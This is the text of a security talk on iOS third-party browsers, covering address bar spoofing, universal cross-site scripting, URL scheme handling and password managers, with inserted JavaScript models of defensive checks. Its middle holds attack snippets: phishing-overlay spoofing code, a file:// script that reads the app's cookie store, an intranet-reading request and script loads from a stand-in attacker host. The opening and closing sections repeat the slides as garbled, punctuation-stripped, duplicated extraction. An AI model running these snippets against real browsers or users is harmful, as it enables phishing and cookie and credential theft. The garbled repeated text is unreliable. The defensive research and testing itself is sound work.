ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security: iOS
Łukasz Pilorz, Paweł Wyleciał
Thank you: Marek Zmysłowski, Aleksander Droś

In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers

iOS Browsers
iOS Browser == Mobile Safari
• iOS App Store Review Guidelines: "Apps that browse the web must use the iOS WebKit framework and WebKit Javascript"

Introduction: iOS Browsers
• WebView-based
• Proxy-rendering

iOS Third-Party Browsers
• > 60 browsers in the App Store
UIWebView & WKWebView

UIWebView API
• loadRequest:
• loadHTMLString:baseURL:
• loadData:MIMEType:textEncodingName:baseURL:
• goBack, goForward, stopLoading, reload
• request (read-only)

UIWebView API
• stringByEvaluatingJavaScriptFromString: runs in the origin of the currently loaded request.mainDocumentURL
• No access to subframes from a domain other than the top document (top document http://example.com, subframe http://hidden.tld)
• JavaScript is used to implement browser features and to override native functions to bridge them with Objective-C code

UIWebViewDelegate
• webView:shouldStartLoadWithRequest:navigationType:
• webViewDidStartLoad:
• webViewDidFinishLoad:
• webView:didFailLoadWithError:

iOS 8 beta: WKWebView
• configuration.preferences
• configuration.userContentController
• navigationDelegate
• UIDelegate
• URL (KVO)
• hasOnlySecureContent (KVO)

Bolted-on by the browsers
• Address bar
• Multiple tabs
• Downloads
• Support for untrusted SSL certificates
• Autocomplete & password manager
• … and many more features (safety ratings, malware protection, cloud integration, …)

Testing
• Inspiration from the Browser Security Handbook
• Retesting previous Mobile Safari bugs
• "Black-box" testing from the web perspective, review of JavaScript code, a bit of reversing and debugging
• Cross-browser test cases: https://iosbrowsr-tests.com

Address Bar Spoofing

Address bar spoofing
• Look-alike URLs, IDN, etc.
• URL tracking desynchronization

URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)
Untracked Content
Replace the window content with untracked content; document.write and/or data: URIs are usually good candidates.
• w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…); }, …);
• CVE-2013-5152: Mobile Safari Address Bar Spoofing, reported in iOS 5.1.1, fixed in iOS 7
Init & Interrupt
Initialise the window with the target URL, then replace it with phishing content before it loads.
• w = window.open('https://accounts.google.com'); w.document.write(…);
Optionally fall back to the native window.open:
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…);
• CVE-2013-6895: Kaspersky Safe Browser
• CVE-2013-6898: F-Secure Safe Browser
• CVE-2013-6897: Dolphin Browser
• … and 45% of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Failed Navigation
An incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN, host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts
Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function(){ location = 'https://accounts.google.com:8443'; }, …);

Title bar
• A phishing page can put a URL into its title: <title>https://www.apple.com</title>

Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying an SSL lock makes sense only if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
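The following is an added example, not code from the slides or from any of the browsers discussed: it models the two address-bar implementations the tips above contrast, both driven by the UIWebViewDelegate event sequence listed earlier. NaiveAddressBar updates on the navigation attempt and derives the lock from the requested scheme; HardenedAddressBar shows only the committed main-document URL and drops the pending URL on failure. The event objects, the `hasOnlySecureContent` field (borrowed from the WKWebView property) and the attacker/target URLs in the scenarios are modelling assumptions.

```javascript
// Added example, not from the slides: an address bar that trusts the
// navigation attempt (NaiveAddressBar) next to one that shows only what the
// web view has committed (HardenedAddressBar). Both consume the same
// UIWebViewDelegate-style events; the event objects and the
// `hasOnlySecureContent` field (borrowed from WKWebView) are assumptions.

class NaiveAddressBar {
  constructor() { this.url = 'about:blank'; this.lock = false; this.loading = false; }
  onShouldStartLoad(req) {
    // Bug 1: the bar changes before any connection exists.
    // Bug 2: the lock is derived from the scheme in the request string.
    this.url = req.url;
    this.lock = req.url.startsWith('https://');
    this.loading = true;
    return true;
  }
  onDidFinishLoad(info) { this.loading = false; }
  onDidFailLoad(err) { this.loading = false; } // Bug 3: the failed URL stays in the bar
}

class HardenedAddressBar {
  constructor() {
    this.committed = 'about:blank'; // last main-document URL really loaded
    this.pending = null;            // navigation in flight, shown only as "loading"
    this.lock = false;
    this.loading = false;
  }
  get url() { return this.committed; }
  onShouldStartLoad(req) { this.pending = req.url; this.loading = true; return true; }
  onDidFinishLoad(info) {
    // Read back what was loaded (webView.request.mainDocumentURL) instead of
    // what was requested, and show the lock only for a validated TLS load.
    this.committed = info.mainDocumentURL;
    this.lock = info.mainDocumentURL.startsWith('https://') && info.hasOnlySecureContent === true;
    this.pending = null;
    this.loading = false;
  }
  onDidFailLoad(err) {
    // webView:didFailLoadWithError: must update the bar too: drop the pending
    // URL so the previously committed page is the one named to the user.
    this.pending = null;
    this.loading = false;
  }
}

function replay(bar, events) {
  for (const ev of events) {
    if (ev.type === 'shouldStart') bar.onShouldStartLoad(ev);
    else if (ev.type === 'didFinish') bar.onDidFinishLoad(ev);
    else if (ev.type === 'didFail') bar.onDidFailLoad(ev);
  }
  return { url: bar.url, lock: bar.lock, loading: bar.loading };
}

const PHISH = 'http://attacker.tld/phish.html';
const phishLoaded = [
  { type: 'shouldStart', url: PHISH },
  { type: 'didFinish', mainDocumentURL: PHISH, hasOnlySecureContent: false },
];
// Constructed scenario 1, "loading loop": navigation to a filtered https port
// that never completes (no didFinish/didFail before the 1-10 minute timeout).
const LOADING_LOOP = phishLoaded.concat([
  { type: 'shouldStart', url: 'https://accounts.google.com:8443/' },
]);
// Constructed scenario 2, "failed navigation": closed TCP port.
const FAILED_NAV = phishLoaded.concat([
  { type: 'shouldStart', url: 'https://www.target.tld:448/' },
  { type: 'didFail', code: -1004 }, // NSURLErrorCannotConnectToHost
]);
// Constructed scenario 3: a genuine, fully validated https load.
const GENUINE = [
  { type: 'shouldStart', url: 'https://accounts.google.com/' },
  { type: 'didFinish', mainDocumentURL: 'https://accounts.google.com/', hasOnlySecureContent: true },
];

function naiveResult(events) { return replay(new NaiveAddressBar(), events); }
function hardenedResult(events) { return replay(new HardenedAddressBar(), events); }
```

Running `naiveResult(LOADING_LOOP)` yields the Google URL with a lock while the phishing page is still on screen; `hardenedResult` keeps naming the attacker page and only signals "loading". The same split appears for the failed navigation, where the naive bar keeps `https://www.target.tld:448/` after the connection error.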

UXSS: Universal Cross-Site Scripting

Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007.
• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
Page JavaScript → bridge message → native call:
• w = window.open('about:blank');
  → mbexec$(WINDOW_ID)[ "command": "window.open", "target": 1234, "url": "about:blank" ]   (target id from Math.random())
  → [webView loadRequest: … "about:blank" …]
• w.document.write('Hi');
  → mbexec$(WINDOW_ID)[ "command": "window.document.write", "target": 1234, "html": "Hi" ]
  → [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]
Cross-frame forgery: Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
• w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>'); … and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi');
  → [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…);
  about:blank is kind of "no URL", right?
  → [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>');
  → applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi');
  → [webView loadHTMLString:@"Hi" baseURL:[NSURL …"about:blank"]]
• iOS 8: use WKWebView.UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
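As an added example (not code from the slides or from Mercury, Yandex.Browser or Chrome), the following JavaScript models the native side of a JavaScript-to-Objective-C bridge that serves cross-tab window.open() and document.write() commands under the three policies this section contrasts: no check at all (the Mercury case), a check made once at open time and cached (the Yandex case, defeated by redirecting the child), and a check repeated on every write against the target tab's current origin, with about:blank children inheriting the opener's origin instead of an SOP-less applewebdata:// document. Tab ids, method names and the attacker/target URLs are constructed for the model.

```javascript
// Added example, not from the slides or any browser's code: a model of the
// native side of a JS<->Objective-C tab bridge under three policies:
// 'none' (no check), 'open-only' (checked once at window.open, cached) and
// 'always' (re-checked on every write against the target's current origin).
// Tab ids, method names and URLs are constructed for the model.

function webOrigin(url) {
  // scheme://host[:port]; null for documents without a web origin
  // (about:blank, applewebdata:, file:), which must never be "same-origin".
  try { const o = new URL(url).origin; return o === 'null' ? null : o; } catch (e) { return null; }
}

class TabBridge {
  constructor(policy) {
    this.policy = policy;
    this.tabs = new Map(); // id -> { url, origin, opener, writableByOpener }
    this.nextId = 1;
    this.evaluated = [];   // [tabId, js] handed to stringByEvaluatingJavaScriptFromString:
  }
  openTab(url) {           // user action, fully trusted
    const id = this.nextId++;
    this.tabs.set(id, { url, origin: webOrigin(url), opener: null, writableByOpener: false });
    return id;
  }
  // "command": "window.open" from tab `caller`
  cmdOpen(caller, url) {
    const callerOrigin = this.tabs.get(caller).origin;
    // about:blank inherits the opener's origin; loading it with baseURL:nil
    // would instead produce an SOP-less applewebdata:// document (CVE-2012-2899).
    const origin = url === 'about:blank' ? callerOrigin : webOrigin(url);
    const id = this.nextId++;
    this.tabs.set(id, {
      url, origin, opener: caller,
      writableByOpener: callerOrigin !== null && origin === callerOrigin, // open-time snapshot
    });
    return id;
  }
  // a redirect or location= change inside the child tab
  navigate(id, url) {
    const t = this.tabs.get(id);
    t.url = url;
    t.origin = webOrigin(url);
  }
  // "command": "window.document.write" from `caller` into `target`
  cmdWrite(caller, target, html) {
    const t = this.tabs.get(target);
    if (!t) return 'denied';
    let allowed;
    if (this.policy === 'none') {
      allowed = true;                                       // Mercury, CVE-2013-6893
    } else if (this.policy === 'open-only') {
      allowed = t.opener === caller && t.writableByOpener;  // Yandex, CVE-2013-7197: stale after navigate()
    } else {
      const callerOrigin = this.tabs.get(caller).origin;
      allowed = t.opener === caller && callerOrigin !== null && t.origin === callerOrigin;
    }
    if (!allowed) return 'denied';
    this.evaluated.push([target, `document.write(${JSON.stringify(html)})`]);
    return 'ok';
  }
}

// Direct attempt: open the target site and write into it.
function directAttack(policy) {
  const b = new TabBridge(policy);
  const attacker = b.openTab('http://attacker.tld/');
  const child = b.cmdOpen(attacker, 'https://accounts.google.com/');
  return b.cmdWrite(attacker, child, '<script src="http://attacker.tld/x.js"></script>');
}
// Redirect attempt: open a same-origin popup, redirect it to the target, then write.
function redirectAttack(policy) {
  const b = new TabBridge(policy);
  const attacker = b.openTab('http://attacker.tld/');
  const child = b.cmdOpen(attacker, 'http://attacker.tld/popup.html');
  b.navigate(child, 'https://accounts.google.com/');
  return b.cmdWrite(attacker, child, '<script src="http://attacker.tld/x.js"></script>');
}
// Legitimate use: a site writing into its own about:blank popup.
function ownPopupWrite(policy) {
  const b = new TabBridge(policy);
  const page = b.openTab('https://example.com/app');
  const child = b.cmdOpen(page, 'about:blank');
  return b.cmdWrite(page, child, 'Hi');
}
```

`redirectAttack('open-only')` returns 'ok': the cached open-time decision survives the child's redirect, which is exactly the Yandex pattern. Only the 'always' policy denies both attacks while still allowing `ownPopupWrite`, which is the behaviour the native side has to reproduce when WebKit's own same-origin policy is bypassed by a bolted-on bridge.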
Other potential paths to the applewebdata:// or file:// origin
• baseURL from a malformed URL string: [NSURL URLWithString:@"http://example.com…"] → nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) → NULL
• Downloads opened directly from file://

Content-Disposition: attachment
• Displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• Isolated attachment origin (iOS 5+)
• document.location.href, document.referrer
• w = window.open('https://' + location.hostname); w.document.write('…') against a custom SOP implementation

Content-Type
• text/plain rendered as HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream rendered as HTML
• application/other with filename=….html
JS without Same-Origin Policy
Reading a local file from a document in the file:// origin (here the application's cookie store):
<script>
  // Rebuild the application container path from this document's own file:// URL
  var a = document.location.href.split('/');
  if (a[0] === 'file:') {
    var path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
    path = path + '/Library/Cookies/Cookies.binarycookies';
    var x = new XMLHttpRequest();
    x.open('GET', path, false); // synchronous file:// read, possible only because SOP is absent
    x.send();
    alert(x.responseText);
  }
</script>

Reading a cross-origin (intranet) resource:
<script>
  var x = new XMLHttpRequest();
  x.open('GET', 'https://your.intranet', false);
  x.send();
  alert(x.responseText);
</script>
Challenge: hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView.configuration.preferences.javaScriptEnabled = false

Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com">, etc. bypass all popup blockers anyway…

URI schemes
• Native (WebKit)
• Application (bolted-on)
• Bridge (internal), e.g.:
  scheme://download?https://secure.tld/victim.data
  scheme://download?http://attacker.tld/README.html
  scheme://add-filter?url=
• Registered (external)
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c, etc.
• Example, Opera Coast: <script>document.location = 'http://%5c';</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315)
  <iframe src="lets-try-format-string://%p%p%p%p…">
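The following is an added example, not code from the slides or from Opera Coast, Mercury or Chrome: it models the decision a browser's webView:shouldStartLoadWithRequest:navigationType: handler should make before a URL reaches native code, covering the three problems in this section: internal bridge commands reachable from web content through <iframe src>, externally registered schemes launched without a user gesture, and percent-encoded hosts that the platform URL parser turns into NULL. The bridge scheme name `mybrowser`, the `nav` fields, the 'browser-ui' source tag and the policy itself are assumptions of the model.

```javascript
// Added example, not from the slides: the decision a browser's
// webView:shouldStartLoadWithRequest:navigationType: handler should make
// before a URL reaches native code. The bridge scheme name `mybrowser`, the
// `nav` fields and the policy are assumptions of the model.

const BRIDGE_SCHEME = 'mybrowser';
const WEB_SCHEMES = new Set(['http', 'https']);
// UIWebViewNavigationType values that imply a user gesture
const USER_GESTURE_TYPES = new Set(['linkClicked', 'formSubmitted']);

function splitUrl(raw) {
  const m = /^([a-z][a-z0-9+.-]*):(?:\/\/([^/?#]*))?(.*)$/i.exec(raw);
  return m ? { scheme: m[1].toLowerCase(), authority: m[2] === undefined ? null : m[2], rest: m[3] } : null;
}

// Percent-decodes the host and rejects what CFURL/NSURL refuse to represent:
// a stray or truncated '%' and decoded bytes outside the hostname alphabet.
function hostIsWellFormed(authority) {
  if (!authority) return false;
  const host = authority.replace(/^[^@]*@/, '').replace(/:\d*$/, '');
  let decoded = '';
  for (let i = 0; i < host.length; i++) {
    if (host[i] !== '%') { decoded += host[i]; continue; }
    const hex = host.slice(i + 1, i + 3);
    if (!/^[0-9a-f]{2}$/i.test(hex)) return false;   // "http://%", "http://%5"
    decoded += String.fromCharCode(parseInt(hex, 16));
    i += 2;
  }
  return /^[a-z0-9.-]+$/i.test(decoded);               // "http://%5c" decodes to "\" -> rejected
}

// nav = { url, isMainFrame, sourceOrigin, navigationType }
// sourceOrigin is the origin of the document that initiated the navigation;
// the browser's own UI pages are tagged 'browser-ui'.
function decideNavigation(nav) {
  const u = splitUrl(nav.url);
  if (!u) return { allow: false, reason: 'unparseable' };

  if (u.scheme === BRIDGE_SCHEME) {
    // Bridge commands (download, add-filter, ...) only from the browser's own
    // pages, and only as top-level navigations: an <iframe src="mybrowser://...">
    // planted by web content must never reach the command dispatcher.
    if (!nav.isMainFrame || nav.sourceOrigin !== 'browser-ui') {
      return { allow: false, reason: 'bridge command from web content' };
    }
    return { allow: true, action: 'bridge' };
  }
  if (WEB_SCHEMES.has(u.scheme)) {
    if (!hostIsWellFormed(u.authority)) return { allow: false, reason: 'malformed host' };
    return { allow: true, action: 'load' };
  }
  // Everything else is a scheme registered by some other app.
  if (!nav.isMainFrame) return { allow: false, reason: 'external scheme from subframe' };
  if (!USER_GESTURE_TYPES.has(nav.navigationType)) {
    return { allow: false, reason: 'external scheme without user gesture' };
  }
  return { allow: true, action: 'openURL' };
}

// Constructed requests mirroring the test cases on the slides.
const SAMPLE_NAVIGATIONS = [
  { url: 'mybrowser://download?http://attacker.tld/README.html', isMainFrame: false, sourceOrigin: 'http://attacker.tld', navigationType: 'other' },
  { url: 'merc://example.com', isMainFrame: false, sourceOrigin: 'http://attacker.tld', navigationType: 'other' },
  { url: 'googlechrome://example.com', isMainFrame: true, sourceOrigin: 'http://attacker.tld', navigationType: 'linkClicked' },
  { url: 'http://%5c', isMainFrame: true, sourceOrigin: 'http://attacker.tld', navigationType: 'other' },
  { url: 'https://www.target.tld:448/', isMainFrame: true, sourceOrigin: 'http://attacker.tld', navigationType: 'other' },
];
```

Mapping `decideNavigation` over `SAMPLE_NAVIGATIONS` denies the two iframe-planted scheme URLs and the `%5c` host, allows the user-clicked external scheme as an openURL action, and lets the ordinary https load through to the web view. The host check runs before the string is handed to CFURL, which is the place a NULL from CFURLCreateWithString has to be caught.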

SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript runs with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with or without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
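As an added example (not code from the slides or from any of the tested browsers), the JavaScript below models the fill and save decisions of a bolted-on password manager that keys credentials by the full origin of the top document (scheme, host and port) instead of by domain, refuses to fill into subframes, and refuses to fill or save on pages whose certificate validation was overridden by the user. The `page` and `form` objects, the store layout, the `tlsOverridden` flag and the sample credentials are constructed for the model.

```javascript
// Added example, not from the slides: fill and save decisions of a bolted-on
// password manager keyed by full origin (scheme, host, port) of the top
// document. The `page`/`form` objects, the store format, `tlsOverridden` and
// the sample credentials are assumptions of the model.

function webOrigin(url) {
  try { const o = new URL(url).origin; return o === 'null' ? null : o; } catch (e) { return null; }
}

// Constructed sample store.
const SAVED = [
  { origin: 'https://accounts.google.com', username: 'alice', password: 'hunter2' },
  { origin: 'https://www.paypal.com', username: 'bob', password: 'correct horse' },
];

// page = { url, isTopFrame, tlsOverridden }
function credentialsToFill(page, entries) {
  if (!page.isTopFrame) return [];      // JS runs with top-frame privileges; never fill subframes
  if (page.tlsOverridden) return [];    // a user-accepted invalid certificate is not a validated connection
  const origin = webOrigin(page.url);
  if (origin === null) return [];       // about:blank, applewebdata:, file:
  return entries.filter(e => e.origin === origin);
}

// The weak policy from the slides, for contrast: host match only, so an
// http:// page receives credentials saved for https://, and any port matches.
function credentialsByHostOnly(page, entries) {
  const host = (url) => { try { return new URL(url).hostname; } catch (e) { return null; } };
  const h = host(page.url);
  return h === null ? [] : entries.filter(e => host(e.origin) === h);
}

// Saving: the entry is keyed by the origin of the top document at submit
// time. The form's action URL (attacker-controlled) plays no part in the key,
// so a page cannot force a credential to be saved for another site.
function saveCredential(page, form, entries) {
  if (!page.isTopFrame || page.tlsOverridden) return false;
  const origin = webOrigin(page.url);
  if (origin === null) return false;
  entries.push({ origin, username: form.username, password: form.password });
  return true;
}
```

`credentialsToFill` on `http://accounts.google.com/…` returns nothing while `credentialsByHostOnly` hands out the https credential, which is the scheme confusion the slides describe; a non-default port or a subframe is refused for the same reason. A credential submitted from `http://attacker.tld/` through a form whose action points at accounts.google.com is stored under the attacker's origin and never offered on the real site.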

Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://iosbrowsr-tests.com/

Questions?

Contact: lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
